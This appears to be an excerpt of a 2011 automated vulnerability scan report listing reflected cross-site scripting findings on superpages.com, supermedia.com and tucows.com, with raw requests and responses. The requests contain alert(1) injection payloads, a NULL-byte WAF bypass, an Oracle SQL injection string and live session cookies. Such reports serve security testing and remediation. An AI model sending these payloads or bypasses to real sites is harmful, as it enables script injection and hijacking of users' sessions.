Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20354
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... op7="Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'.354d0";bf98880f27f', the expected format is '_c<conversationId> ...[SNIP]...
The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00e6"%3balert(1)//a43b114193b was submitted in the _flowExecutionKey parameter. This input was echoed as b00e6";alert(1)//a43b114193b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a5103"%3bb8f83f9f764 was submitted in the _flowId parameter. This input was echoed as a5103";b8f83f9f764 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow%00a5103"%3bb8f83f9f764 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:47:13 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22588
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... r=""; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="No such flow definition with id 'loginact-flow.a5103";b8f83f9f764' found; the flows available are: array<String> ...[SNIP]...
3.227. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.supermedia.com
Path: /spportal/spportalFlow.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39e64"%3balert(1)//5b99acdfcf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39e64";alert(1)//5b99acdfcf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20465
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... nable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this request are: map['39e64";alert(1)//5b99acdfcf8' -> ...[SNIP]...
3.228. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631c1"><script>alert(1)</script>026bbe791e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?631c1"><script>alert(1)</script>026bbe791e4=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:52 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:52 GMT;path=/
3.229. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f46'-alert(1)-'8e1de3e7335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a8f46'-alert(1)-'8e1de3e7335=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:54 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:54 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&a8f46'-alert(1)-'8e1de3e7335=1" rel="nofollow"> ...[SNIP]...
3.230. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd053--><script>alert(1)</script>e1950324e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?bd053--><script>alert(1)</script>e1950324e3f=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:59 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:59 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&bd053--><script>alert(1)</script>e1950324e3f=1#" rel="nofollow"> ...[SNIP]...
The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48986"%3balert(1)//3db88e4ace3 was submitted in the cg parameter. This input was echoed as 48986";alert(1)//3db88e4ace3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:19:13 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:34:13 GMT;path=/
var IE = document.all?true:false if (!IE) document.captureEvents(Event.MOUSEMOVE) document.onmousemove = getMouseXY; var tempX = 0 var tempY = 0 function getMouseXY(e) { if (IE) { // grab the x-y po ...[SNIP]... <a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=948986";alert(1)//3db88e4ace3&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\"> ...[SNIP]...
3.232. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e8a"-alert(1)-"2f831598e8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e2e8a"-alert(1)-"2f831598e8d=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f530"-alert(1)-"6001743e8c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about.html8f530"-alert(1)-"6001743e8c7 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.234. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /about.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf95a"-alert(1)-"9164bc1eed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about.html?cf95a"-alert(1)-"9164bc1eed8=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 32110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5253"-alert(1)-"eb5b61b7f5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise.htmla5253"-alert(1)-"eb5b61b7f5a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.236. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /advertise.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff349"-alert(1)-"f7b0a9fb104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise.html?ff349"-alert(1)-"f7b0a9fb104=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5278d"-alert(1)-"005c7cc4526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate5278d"-alert(1)-"005c7cc4526/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd2c"-alert(1)-"15b6c2e9e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.239. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /affiliate/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91153"-alert(1)-"4395b206045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.html?91153"-alert(1)-"4395b206045=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
